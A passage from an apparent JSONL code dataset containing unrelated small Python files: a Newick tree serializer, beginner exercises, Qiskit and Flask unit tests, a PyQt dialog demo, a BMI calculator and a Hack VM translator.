None.\r\n \"\"\"\r\n if len(self.children)==0:\r\n return \"{0}:{1}\".format(self.node_id,self.get_length())\r\n s=\"(\"+str(self.children[0].newick(intern))\r\n for i in range(1,len(self.children)):\r\n s+=\",\"+str(self.children[i].newick(intern))\r\n s+=')'\r\n if self.parent is None:return s\r\n if intern:s+=str(self.node_id)\r\n s+=\":{0}\".format(self.get_length())\r\n return s\r\n \r\n \r\n def full_newick(self,intern=False):\r\n \"\"\"\r\n \r\n\r\n Parameters\r\n ----------\r\n intern : TYPE, optional\r\n DESCRIPTION. The default is False.\r\n\r\n Returns\r\n -------\r\n None.\r\n\r\n \"\"\"\r\n l = str(self.get_length())\r\n s = '('+self.newick(intern=intern)+'0:'+l+')'\r\n\r\n return s\r\n\r\n \r\n def newick_labels(self):\r\n \"\"\"\r\n Convert the tree to the newick representation. \r\n In this syntax, the interior nodes have no name, and are defined by\r\n the set of leaves (splits) one can have by removing them.\r\n \r\n Parameters\r\n ----------\r\n intern : bool (Default : False)\r\n Whether the node is interior or not.\r\n bl : bool (Default : False)\r\n Whether we want the length of the branches or not.\r\n\r\n Returns\r\n -------\r\n None.\r\n \"\"\"\r\n if len(self.children)==0:\r\n return \"{0}:{1}\".format(self.label,self.get_length())\r\n s=\"(\"+str(self.children[0].newick_labels())\r\n for i in range(1,len(self.children)):\r\n s+=\",\"+str(self.children[i].newick_labels())\r\n s+=')'\r\n if self.parent is None:return s #'('+s+':'+str(self.get_length())+')'\r\n s+=\":{0}\".format(self.get_length())\r\n return s\r\n \r\n","repo_name":"HughLDDMM/TreeLDDMMCVPR","sub_path":"tree_space/node_class.py","file_name":"node_class.py","file_ext":"py","file_size_in_byte":24806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"20897601927","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Grid Drawer\n\n# In[ ]:\n\n\ndef draw_grid(m=2, n=3):\n index = 0\n while index < m:\n print('+'+' - - +'*n)\n print('/'+' /'*n)\n print('/'+' /'*n)\n index = index + 1\n print('+'+' - - +'*n)\n\n\n# In[ ]:\n\n\nif __name__ == '__main__': \n draw_grid()\n draw_grid(3, 2)\n\n\n# # Estimate pi\n\n# In[ ]:\n\n\nimport math\ndef estimate_pi():\n k = 0\n s = 0.0\n t = 0.0\n while True:\n t = (math.factorial(4*k)*(1103+26390*k))/(math.pow(math.factorial(k), 4)*math.pow(396, (4*k)))\n s += t\n k += 1\n if t < 1e-15:\n break\n \n s *= (2*math.sqrt(2))/9801\n return 1/s\n\n\n# In[ ]:\n\n\nif __name__ == '__main__': \n print(estimate_pi() == math.pi)\n print(estimate_pi())\n print(math.pi)\n\n\n# # Reverse Pair\n\n# In[ ]:\n\n\ndef find_reverse_pair(word_list, case_sensitive = False):\n reverse_pair_list = []\n \n if not case_sensitive:\n word_list = [word.lower() for word in word_list]\n \n for word in word_list:\n if word[::-1] in word_list[word_list.index(word) + 1::]:\n reverse_pair_list.append([word, word[::-1]])\n \n return reverse_pair_list\n\n\n# In[ ]:\n\n\nif __name__ == '__main__': \n import time\n time_start = time.time()\n\n with open(r'C:\\Users\\88697\\Downloads\\words.txt', 'r') as file:\n word_list = file.read().splitlines()\n reverse_pair_list = find_reverse_pair(word_list)\n\n time_end = time.time()\n\n print('Finish executing after', time_end - time_start, 's\\n')\n print('Found', len(reverse_pair_list), 'reverse pairs\\n', )\n print(reverse_pair_list)\n\n\n# # Reverse Lookup\n\n# In[ ]:\n\n\ndef reverse_lookup(d, v):\n k = []\n if v in d.values():\n for k1 in d:\n if d.get(k1) == v:\n k.append(k1)\n return k\n\n\n# In[ ]:\n\n\nif __name__ == '__main__':\n ben = {'name':'James', 'age':26, 'best friend':'James', 'shoe size':26, 24:'James', 23:26}\n print(reverse_lookup(ben, 'James'))\n\n","repo_name":"ndrw1221/Data-Science","sub_path":"Lab02/Data Science Lab02.py","file_name":"Data Science Lab02.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22186515423","text":"import sys\r\n# set default encoding to windows locale in order to handle unicode path names\r\n# correctly. This is done here for built executables\r\n# or in Lib\\site.py when running from sources\r\n\r\nif sys.platform == 'win32':\r\n import locale, codecs\r\n enc = locale.getdefaultlocale()[1]\r\n if enc.startswith('cp'): # \"cp***\" ?\r\n try:\r\n codecs.lookup(enc)\r\n except LookupError:\r\n import encodings\r\n encodings._cache[enc] = encodings._unknown\r\n encodings.aliases.aliases[enc] = 'mbcs'\r\n\r\n if hasattr(sys, 'setdefaultencoding'):\r\n try:\r\n sys.setdefaultencoding(enc)\r\n except LookupError:\r\n sys.setdefaultencoding('ascii')\r\n del sys.setdefaultencoding\r\n","repo_name":"clamwin/clamwin","sub_path":"py/SetUnicode.py","file_name":"SetUnicode.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"31"} +{"seq_id":"32863364835","text":"import numpy as np\n\nfrom test.common import QiskitAquaTestCase\nfrom qiskit.aqua import get_aer_backend\n\nfrom qiskit.aqua import run_algorithm\nfrom qiskit.aqua.input import EnergyInput\nfrom qiskit.aqua.translators.ising import clique\nfrom qiskit.aqua.algorithms import ExactEigensolver\n\n\nclass TestClique(QiskitAquaTestCase):\n \"\"\"Cplex Ising tests.\"\"\"\n\n def setUp(self):\n super().setUp()\n self.K = 5 # K means the size of the clique\n np.random.seed(100)\n self.num_nodes = 5\n self.w = clique.random_graph(self.num_nodes, edge_prob=0.8, weight_range=10)\n self.qubit_op, self.offset = clique.get_clique_qubitops(self.w, self.K)\n self.algo_input = EnergyInput(self.qubit_op)\n\n def brute_force(self):\n # brute-force way: try every possible assignment!\n def bitfield(n, L):\n result = np.binary_repr(n, L)\n return [int(digit) for digit in result]\n\n L = self.num_nodes # length of the bitstring that represents the assignment\n max = 2**L\n has_sol = False\n for i in range(max):\n cur = bitfield(i, L)\n cur_v = clique.satisfy_or_not(np.array(cur), self.w, self.K)\n if cur_v:\n has_sol = True\n break\n return has_sol\n\n def test_clique(self):\n params = {\n 'problem': {'name': 'ising'},\n 'algorithm': {'name': 'ExactEigensolver'}\n }\n result = run_algorithm(params, self.algo_input)\n x = clique.sample_most_likely(len(self.w), result['eigvecs'][0])\n ising_sol = clique.get_graph_solution(x)\n np.testing.assert_array_equal(ising_sol, [1, 1, 1, 1, 1])\n oracle = self.brute_force()\n self.assertEqual(clique.satisfy_or_not(ising_sol, self.w, self.K), oracle)\n\n def test_clique_direct(self):\n algo = ExactEigensolver(self.algo_input.qubit_op, k=1, aux_operators=[])\n result = algo.run()\n x = clique.sample_most_likely(len(self.w), result['eigvecs'][0])\n ising_sol = clique.get_graph_solution(x)\n np.testing.assert_array_equal(ising_sol, [1, 1, 1, 1, 1])\n oracle = self.brute_force()\n self.assertEqual(clique.satisfy_or_not(ising_sol, self.w, self.K), oracle)\n\n def test_clique_vqe(self):\n algorithm_cfg = {\n 'name': 'VQE',\n 'operator_mode': 'matrix',\n 'batch_mode': True\n }\n\n optimizer_cfg = {\n 'name': 'COBYLA'\n }\n\n var_form_cfg = {\n 'name': 'RY',\n 'depth': 5,\n 'entanglement': 'linear'\n }\n\n params = {\n 'problem': {'name': 'ising', 'random_seed': 10598},\n 'algorithm': algorithm_cfg,\n 'optimizer': optimizer_cfg,\n 'variational_form': var_form_cfg\n }\n backend = get_aer_backend('statevector_simulator')\n result = run_algorithm(params, self.algo_input, backend=backend)\n x = clique.sample_most_likely(len(self.w), result['eigvecs'][0])\n ising_sol = clique.get_graph_solution(x)\n np.testing.assert_array_equal(ising_sol, [1, 1, 1, 1, 1])\n oracle = self.brute_force()\n self.assertEqual(clique.satisfy_or_not(ising_sol, self.w, self.K), oracle)\n","repo_name":"epiqc/PartialCompilation","sub_path":"qiskit-aqua/test/test_clique.py","file_name":"test_clique.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"23146928902","text":"import os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom flaskr import create_app\nfrom models import setup_db, Question, Category\n\n\nclass TriviaTestCase(unittest.TestCase):\n \"\"\"This class represents the trivia test case\"\"\"\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"trivia_test\"\n self.database_user = \"postgres\"\n self.database_password = \"Passasdk\"\n self.database_host = \"localhost\"\n self.database_port = \"5432\"\n self.database_path = f'postgresql://{self.database_user}:{self.database_password}@{self.database_host}:{self.database_port}/{self.database_name}'\n setup_db(self.app, self.database_path)\n\n self.new_question = {\n \"question\": 'Which planet has a moon named The Moon?',\n \"answer\": \"Earth\",\n \"difficulty\": 3,\n \"category\": 1\n }\n\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n \n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n \"\"\"\n DONE\n Write at least one test for each test for successful \n operation and for expected errors.\n \"\"\"\n #... Test for catrgory\n def test_retrive_categories(self):\n res = self.client().get('/categories')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n\n\n def test_questions_by_category(self):\n res = self.client().get('/categories/1/questions')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n\n\n def test_404_sent_request_beyond_valid_category(self):\n res = self.client().get('/categories/1000/questions')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Unprocessable')\n\n\n def test_retrieve_categories_faliur(self):\n res = self.client().post('/categories', json={'astronmy': 'xyz'})\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 405)\n self.assertFalse(data['success'])\n self.assertEqual(data['message'], 'Method not allowed')\n\n\n #... Test for questions paginations\n def test_retrive_questions(self):\n res = self.client().get('/questions')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(len(data['questions']), 10)\n #... the rest for the page\n\n\n def test_404_sent_request_beyond_valid_page(self):\n res = self.client().get('/questions?page=500', json={'category': str(2)})\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Resource is not found') \n\n\n def test_422_sent_request_page_0(self):\n res = self.client().get('/questions?page=0', json={'category': str(2)})\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Resource is not found') \n\n\n #... Test for deletion\n def test_delete_question(self):\n question = Question.query.order_by(Question.id.desc()).first()\n question_id = question.id\n\n res = self.client().delete('/questions/{}'.format(question_id))\n data = json.loads(res.data)\n question_state = Question.query.filter(Question.id == question_id).one_or_none()\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['deleted'], f'question id = {question_id} deleted')\n self.assertEqual(question_state, None)\n\n\n def test_delete_question_failure(self):\n question_id = -1\n res = self.client().delete('/questions/{}'.format(question_id))\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertFalse(data['success'])\n self.assertEqual(data['message'], 'Resource is not found')\n\n\n #... Test for creation\n def test_create_question(self):\n res = self.client().post('/questions', json=self.new_question)\n data = json.loads(res.data)\n new_question = Question.query.order_by(Question.id.desc()).first()\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['created'], new_question.id)\n\n\n def test_create_question_failure(self):\n #... with missing piece of info\n new_question = {\n \"question\": 4,\n \"difficulty\": 'xyz',\n \"category\": '1'\n }\n res = self.client().post('/questions', json=new_question)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 422)\n self.assertFalse(data['success'])\n self.assertEqual(data['message'], 'Unprocessable')\n\n\n #... Test for searching \n def test_search_questions(self):\n res = self.client().post('/questions/search', json={\"searchTerm\": 'title'})\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['current_questions'])\n\n\n def test_search_questions_success_no_results(self):\n response = self.client().post('/questions/search', json={\"searchTerm\": 'xxxxxxx'})\n data = json.loads(response.data)\n\n self.assertEqual(response.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Resource is not found')\n\n\n\n #... Test for quizz\n def test_quizzes_failure(self):\n category = Category.query.first()\n res = self.client().post('/quizzes', json={'quiz_category': category.format()})\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 422)\n self.assertFalse(data['success'])\n self.assertEqual(data['message'], 'Unprocessable')\n\n\n def test_quizzes_success(self):\n category = \"History\"\n\n res = self.client().post('/quizzes', json={'quiz_category': {'type': 'History', 'id': '4'},\n 'previous_questions': [9, 12]})\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['question']) \n\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"A-Mido/Trivia_APP","sub_path":"backend/test_flaskr.py","file_name":"test_flaskr.py","file_ext":"py","file_size_in_byte":6904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18292318091","text":"import open3d as o3d\nimport copy\nimport numpy as np\npc = o3d.io.read_point_cloud('/data/endoscope/simulation_data/contour.ply')\nprojected_pc = o3d.io.read_point_cloud('/data/endoscope/simulation_data/label_contour_reprojected.ply')\n\npseudo_3d = False\n\nif pseudo_3d:\n z_points = np.asarray(copy.deepcopy(pc.points))\n z_points.std(axis=0)\n z_points[:,-1] = np.random.normal(loc=0.1,scale=0.001,size=z_points.shape[0])\n new_pc = o3d.geometry.PointCloud()\n new_pc.points = o3d.open3d.utility.Vector3dVector(z_points)\nelse:\n new_pc = copy.deepcopy(pc)\n\ndef cloud2image(extrinsics,intrinsics,point_cloud_path=\"/data/endoscope/simulation_data/contour.ply\"):\n pc = o3d.io.read_point_cloud(point_cloud_path)\n points = np.asarray(pc.points)\n points = np.c_[points,np.ones(points.shape[0])]\n new_points = np.linalg.inv(extrinsics) @ points.T\n new_points = new_points[:3,:]\n new_points /= new_points[:,-1]\n return new_points\n projected_new_points = intrinsics @ new_points\n return projected_new_points\n\n# R = new_pc.get_rotation_matrix_from_xyz((0,0,np.pi/18))\n# new_pc.rotate(R)\n# print(R)\n# new_pc.translate((0.0002, 0.001, 0.5))\n\n# pc_r.scale(1.1)\n# o3d.io.write_point_cloud('/home/SENSETIME/xulixin2/code/multimodal-registration-master/new_gradient-hystheresis-image.ply',new_pc,write_ascii=True)\no3d.visualization.draw_geometries([pc])\n\n\n\n","repo_name":"blacksino/virtual_camera","sub_path":"point_clound.py","file_name":"point_clound.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9818417196","text":"num1 = 0\nnum2 = 0\nans = 0\n\nchoice = input(\"What would you like to do - enter numbers/read file:\\n\").lower()\nprint(choice)\nif choice == \"enter number\":\n\ttry:\n\t\twith open('equations.txt','a') as f:\n\t\t\tprint(\"in\")\n\t\n\texcept Exception:\n\t\tprint(\"Error, file does not exist.\")\n","repo_name":"Ejay14/Python","sub_path":"tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4117497589","text":"'''\no programa anterior, deve informar ao final o aluno com maior e menor imc.\n'''\nnome=[]\nPesoA=[]\nAlturaA=[]\nimcA=[]\nmediaP= 0\nmediaA= 0\nmediaIMC=0\nmaiorimc=0\nmaiorimcnome=\"a\"\nmenorimc=0\nmenorimcnome=\"a\"\nquant=int(input(\"Informe a quantidade de alunos da turma: \"))\n #Enntrada de Dados e Calculo IMC\nfor i in range(quant):\n nome.append(input(\"Digite o nome do aluno: \"))\n PesoA.append(float(input(\"Digite o peso: \")))\n AlturaA.append(float(input(\"Digite a altura: \")))\n imcA.append(PesoA[i]/(AlturaA[i]**2))\n #Calculo das medias e procura do maior e menor IMC\nmenorimc=imcA[0]\nfor i in range(quant):\n mediaP=mediaP+PesoA[i]\n mediaA=mediaA+AlturaA[i]\n mediaIMC=mediaIMC+imcA[i]\n if (imcA[i] > maiorimc):\n maiorimc=imcA[i]\n maiorimcnome=nome[i]\n if (imcA[i] < menorimc):\n menorimc=imcA[i]\n menorimcnome=nome[i]\nmediaP=mediaP/quant\nmediaA=mediaA/quant\nmediaIMC=mediaIMC/quant\n #Saida\nprint(\"A média dos Pesos é : %f\"%mediaP)\nprint(\"A média das Alturas é: %f\"%mediaA)\nprint(\"A média dos IMC's é: %f\"%mediaIMC)\nprint(\"O Aluno %s é o dono do maior IMC, que é: %d\"%(maiorimcnome,maiorimc))\nprint(\"O Aluno %s é o dono do maior IMC, que é: %d\"%(menorimcnome,menorimc))\n","repo_name":"mmichaelfelipe/Python-Algoritmos","sub_path":"04 Aula 05 04/8_ IMC.py","file_name":"8_ IMC.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73488170968","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 29 15:01:57 2022\r\n\r\n@author: thijs\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport random\r\n\r\ndef random_spawns(agents): \r\n x = []\r\n y = []\r\n z = []\r\n \r\n #map dimensions\r\n c = 11\r\n d = 24\r\n \r\n #open file containing map\r\n with open('C:/Users/thijs/OneDrive/Bureaublad/Bio_Based/instance2.txt') as f:\r\n [x.append(line) for line in f.readlines()]\r\n\r\n f.close()\r\n #find allowable starting locations in first two columns and last two rows of map\r\n for i in np.arange(1, c-1, 1):\r\n for j in np.arange(1,3):\r\n y.append([i, j])\r\n for i in np.arange(1, c-1, 1):\r\n for j in np.arange(d - 3, d-1, 1):\r\n z.append([i, j])\r\n #open file to wirte random start and goal locs in\r\n with open('C:/Users/thijs/OneDrive/Bureaublad/Bio_Based/Assignment.txt', 'w') as f:\r\n for i in range(len(x)):\r\n f.write(x[i])\r\n f.write('\\n')\r\n f.write(str(agents))\r\n for ii in range(agents):\r\n a = random.randint(1, len(y)-1)\r\n b = random.randint(1, len(z)-1)\r\n #randomly select a start and goal loc from the allowable locations\r\n start_loc = y[a-1]\r\n goal_loc = z[b-1]\r\n y.remove(y[a-1])\r\n z.remove(z[b-1])\r\n \r\n #write start and goal locs into assignment file\r\n txt = str(start_loc[0])\r\n txt1 = str(start_loc[1])\r\n txt2 = str(goal_loc[0])\r\n txt3 = str(goal_loc[1])\r\n f.write('\\n')\r\n f.write(txt)\r\n f.write(' ')\r\n f.write(txt1)\r\n f.write(' ')\r\n f.write(txt2)\r\n f.write(' ')\r\n f.write(txt3)","repo_name":"ThijsBe/Bio_Based_AE4350","sub_path":"Randomized_spawns.py","file_name":"Randomized_spawns.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6348311904","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 28 18:18:11 2021\n\n@author: dogancan Torun\n\"\"\"\n\n\n#Diyalog pencereleri iki şekilde olur #Arka tarafla etkileşemeyen,modal ,etkileşemeyen modless olarak adlandırılır \n#Bir Gui üzerinde modal ve modless tasarımı yapacağım \n#Ana menü üzerinde her iki modeli inşa edeceğim \n#Qdialogdan sınıf türetip o sınıftan nesne yaratıp exec ile bunu çağırmalıyız. \nimport sys\n\nfrom PyQt5.Qt import *\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n self.resize(640, 480)\n self.setFont(QFont('Arial', 12))\n\n dialogPopup = QMenu('Dialog', self)\n self.modalAction = dialogPopup.addAction('Modal...')\n self.modalAction.setFont(QFont('Arial', 12))\n self.modalAction.setShortcut('Ctrl+D')\n self.modalAction.triggered.connect(self.modalActionHandler)\n self.menuBar().addMenu(dialogPopup)\n\n def modalActionHandler(self):\n mmd = MyModalDialog(self)\n if mmd.exec() == QDialog.Accepted:\n name = mmd.lineEditName.text()\n no = mmd.lineEditNo.text()\n\n QMessageBox.information(self, 'Info', name + '\\n' + no)\n\nclass MyModalDialog(QDialog):\n def __init__(self, parent):\n super().__init__(parent)\n self.resize(370, 120)\n\n self.labelName = QLabel('Adı Soyadı:', self)\n self.labelName.move(10, 10)\n self.labelName.move(10, 10)\n\n self.lineEditName = QLineEdit(self)\n self.lineEditName.move(100, 10)\n\n self.labelNo = QLabel('No:', self)\n self.labelNo.move(10, 40)\n\n self.lineEditNo = QLineEdit(self)\n self.lineEditNo.move(100, 40)\n\n self.pushButtonOk = QPushButton('Ok', self)\n self.pushButtonOk.clicked.connect(self.pushButtonOkHandler)\n self.pushButtonOk.setGeometry(150, 80, 70, 25)\n\n self.pushButtonCancel = QPushButton('Cancel', self)\n self.pushButtonCancel.clicked.connect(self.pushButtonCancelHandler)\n self.pushButtonCancel.setGeometry(230, 80, 70, 25)\n\n def pushButtonOkHandler(self):\n self.done(QDialog.Accepted)\n\n def pushButtonCancelHandler(self):\n self.done(QDialog.Rejected)\n\napp = QApplication(sys.argv)\nmainWindow = MainWindow()\nmainWindow.show()\napp.exec()","repo_name":"dogancantorun8/python-application","sub_path":"PYQT/pyqt26_diyalog_pencereleri_giris.py","file_name":"pyqt26_diyalog_pencereleri_giris.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32864747495","text":"import unittest\nimport qiskit\nimport qiskit.extensions.simulator\nfrom qiskit.quantum_info import state_fidelity\nfrom qiskit import execute\nfrom qiskit.test import QiskitTestCase, requires_aer_provider\n\n\n@requires_aer_provider\nclass TestCrossSimulation(QiskitTestCase):\n \"\"\"Test output consistency across simulators (from built-in and legacy simulators & IBMQ)\n \"\"\"\n _desired_fidelity = 0.99\n\n def test_statevector(self):\n \"\"\"statevector from a bell state\"\"\"\n qr = qiskit.QuantumRegister(2)\n circuit = qiskit.QuantumCircuit(qr)\n circuit.h(qr[0])\n circuit.cx(qr[0], qr[1])\n\n sim_cpp = qiskit.providers.aer.StatevectorSimulator()\n sim_py = qiskit.providers.builtinsimulators.StatevectorSimulatorPy()\n result_cpp = execute(circuit, sim_cpp).result()\n result_py = execute(circuit, sim_py).result()\n statevector_cpp = result_cpp.get_statevector()\n statevector_py = result_py.get_statevector()\n fidelity = state_fidelity(statevector_cpp, statevector_py)\n self.assertGreater(\n fidelity, self._desired_fidelity,\n \"cpp vs. py statevector has low fidelity{0:.2g}.\".format(fidelity))\n\n def test_qasm(self):\n \"\"\"counts from a GHZ state\"\"\"\n qr = qiskit.QuantumRegister(3)\n cr = qiskit.ClassicalRegister(3)\n circuit = qiskit.QuantumCircuit(qr, cr)\n circuit.h(qr[0])\n circuit.cx(qr[0], qr[1])\n circuit.cx(qr[1], qr[2])\n circuit.measure(qr, cr)\n\n sim_cpp = qiskit.providers.aer.QasmSimulator()\n sim_py = qiskit.providers.builtinsimulators.QasmSimulatorPy()\n shots = 2000\n result_cpp = execute(circuit, sim_cpp, shots=shots).result()\n result_py = execute(circuit, sim_py, shots=shots).result()\n counts_cpp = result_cpp.get_counts()\n counts_py = result_py.get_counts()\n self.assertDictAlmostEqual(counts_cpp, counts_py, shots*0.08)\n\n def test_qasm_reset_measure(self):\n \"\"\"counts from a qasm program with measure and reset in the middle\"\"\"\n qr = qiskit.QuantumRegister(3)\n cr = qiskit.ClassicalRegister(3)\n circuit = qiskit.QuantumCircuit(qr, cr)\n circuit.h(qr[0])\n circuit.cx(qr[0], qr[1])\n circuit.reset(qr[0])\n circuit.cx(qr[1], qr[2])\n circuit.t(qr)\n circuit.measure(qr[1], cr[1])\n circuit.h(qr[2])\n circuit.measure(qr[2], cr[2])\n\n sim_cpp = qiskit.providers.aer.QasmSimulator()\n sim_py = qiskit.providers.builtinsimulators.QasmSimulatorPy()\n shots = 1000\n result_cpp = execute(circuit, sim_cpp, shots=shots, seed=1).result()\n result_py = execute(circuit, sim_py, shots=shots, seed=1).result()\n counts_cpp = result_cpp.get_counts()\n counts_py = result_py.get_counts()\n self.assertDictAlmostEqual(counts_cpp, counts_py, shots * 0.06)\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"epiqc/PartialCompilation","sub_path":"qiskit-terra/test/python/aer_provider_integration_test/test_simulator_interfaces.py","file_name":"test_simulator_interfaces.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"37023713368","text":"# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, val=0, next=None):\r\n# self.val = val\r\n# self.next = next\r\nclass Solution:\r\n def middleNode(self, head: Optional[ListNode]) -> Optional[ListNode]:\r\n n = 0\r\n c = 0\r\n current = head\r\n while current:\r\n current = current.next\r\n n += 1\r\n \r\n current = head\r\n for i in range(n//2):\r\n current = current.next\r\n return current\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"arafimam/Data-Structure-and-Algorithm-Revision","sub_path":"Python_Solutions_alyosha/Middle of linked list.py","file_name":"Middle of linked list.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"39667945792","text":"import Parser\r\nimport CodeWriter as cw\r\nfrom sys import argv\r\n\r\nwindow_path = 'D:\\_wanghui\\\\workspace\\nand2tetris\\\\projects\\\\08\\\\FunctionCalls\\\\NestedCall\\Sys.vm'\r\n\r\nDEBUG = 0\r\n\r\nif DEBUG == 1:\r\n\tf = open('ProgramFlow/FibonacciSeries/FibonacciSeries.vm')\r\nelif DEBUG == 2:\r\n\tf = open(window_path[window_path[:window_path[:window_path.rfind('\\\\')].rfind('\\\\')].rfind('\\\\')+1:].replace('\\\\','/'))\r\nelse:\r\n\tf = open(argv[1])\r\n\r\ntemp_vm_content = ''\r\noutput = ''\r\n\r\nlines = f.readlines()\r\n\r\n\r\nfor (idx,l) in enumerate(lines):\r\n\tcleaned_cmd = Parser.clean(l)\r\n\t\r\n\tif DEBUG:\r\n\t\tprint('//' + Parser.clean(l), end = '')\r\n\r\n\tcmd_type = Parser.cmdType(cleaned_cmd)\r\n\tif cmd_type == Parser.C_ARITHMETIC:\r\n\t\tc = cw.arithmetric_translate(cleaned_cmd)\r\n\t\toutput = output + c\r\n\r\n\t\tif DEBUG:\r\n\t\t\tprint('- cmd type: C_ARITHMETIC')\r\n\t\t\tprint(c)\r\n\r\n\tif cmd_type == Parser.C_PUSH:\r\n\t\targ1 = Parser.arg1(cleaned_cmd)\r\n\t\targ2 = Parser.arg2(cleaned_cmd)\r\n\t\tif arg1 == 'static':\r\n\t\t\targ1 = argv[1] + arg1\r\n\t\tc = cw.push_translate(arg1, arg2)\r\n\t\toutput = output + c\r\n\r\n\t\tif DEBUG:\r\n\t\t\tprint('- arg1 ' + arg1, end = '')\r\n\t\t\tprint('- arg2 ' + str(arg2), end = '')\r\n\t\t\tprint('- cmd type: C_PUSH')\r\n\t\t\tprint(c)\r\n\tif cmd_type == Parser.C_POP:\r\n\t\targ1 = Parser.arg1(cleaned_cmd)\r\n\t\targ2 = Parser.arg2(cleaned_cmd)\r\n\t\tif arg1 == 'static':\r\n\t\t\targ1 = argv[1] + arg1\r\n\t\tc = cw.pop_translate(arg1, arg2)\r\n\t\toutput = output + c\r\n\r\n\t\tif DEBUG:\r\n\t\t\tprint('- arg1 ' + arg1, end = '')\r\n\t\t\tprint('- arg2 ' + str(arg2), end = '')\r\n\t\t\tprint('- cmd type: C_POP')\r\n\t\t\tprint(c)\r\n\tif cmd_type == Parser.C_LABEL:\r\n\t\tc = cw.label_translate(cleaned_cmd)\r\n\t\toutput = output + c\r\n\r\n\t\tif DEBUG:\r\n\t\t\tprint('- cmd type: C_LABEL')\r\n\t\t\tprint(c)\r\n\tif cmd_type == Parser.C_GOTO:\r\n\t\tc = cw.goto_translate(cleaned_cmd)\r\n\t\toutput = output + c\r\n\t\tif DEBUG:\r\n\t\t\tprint('- cmd type: C_GOTO')\r\n\t\t\tprint(c)\r\n\tif cmd_type == Parser.C_IF:\r\n\t\tc = cw.if_goto_translate(cleaned_cmd)\r\n\t\toutput = output + c\r\n\t\tif DEBUG:\r\n\t\t\tprint('- cmd type: C_IF')\r\n\t\t\tprint(c)\r\n\tif cmd_type == Parser.C_FUNCTION:\r\n\t\tc = cw.func_translate(cleaned_cmd)\r\n\t\toutput = output + c\r\n\t\tif DEBUG:\r\n\t\t\tprint('- cmd type: C_FUNCTION')\r\n\t\t\tprint(c)\r\n\r\n\tif cmd_type == Parser.C_RETURN:\r\n\t\tc = cw.return_translate(cleaned_cmd)\r\n\t\toutput = output + c\r\n\t\tif DEBUG:\r\n\t\t\tprint('- cmd type: C_CALL')\r\n\t\t\tprint(c)\t\t\r\n\tif cmd_type == Parser.C_CALL:\r\n\t\tc = cw.call_translate(cleaned_cmd, argv[1] , idx)\r\n\t\toutput = output + c\r\n\t\tif DEBUG:\r\n\t\t\tprint('- cmd type: C_CALL')\r\n\t\t\tprint(c)\t\t\r\n\r\noutput = output + 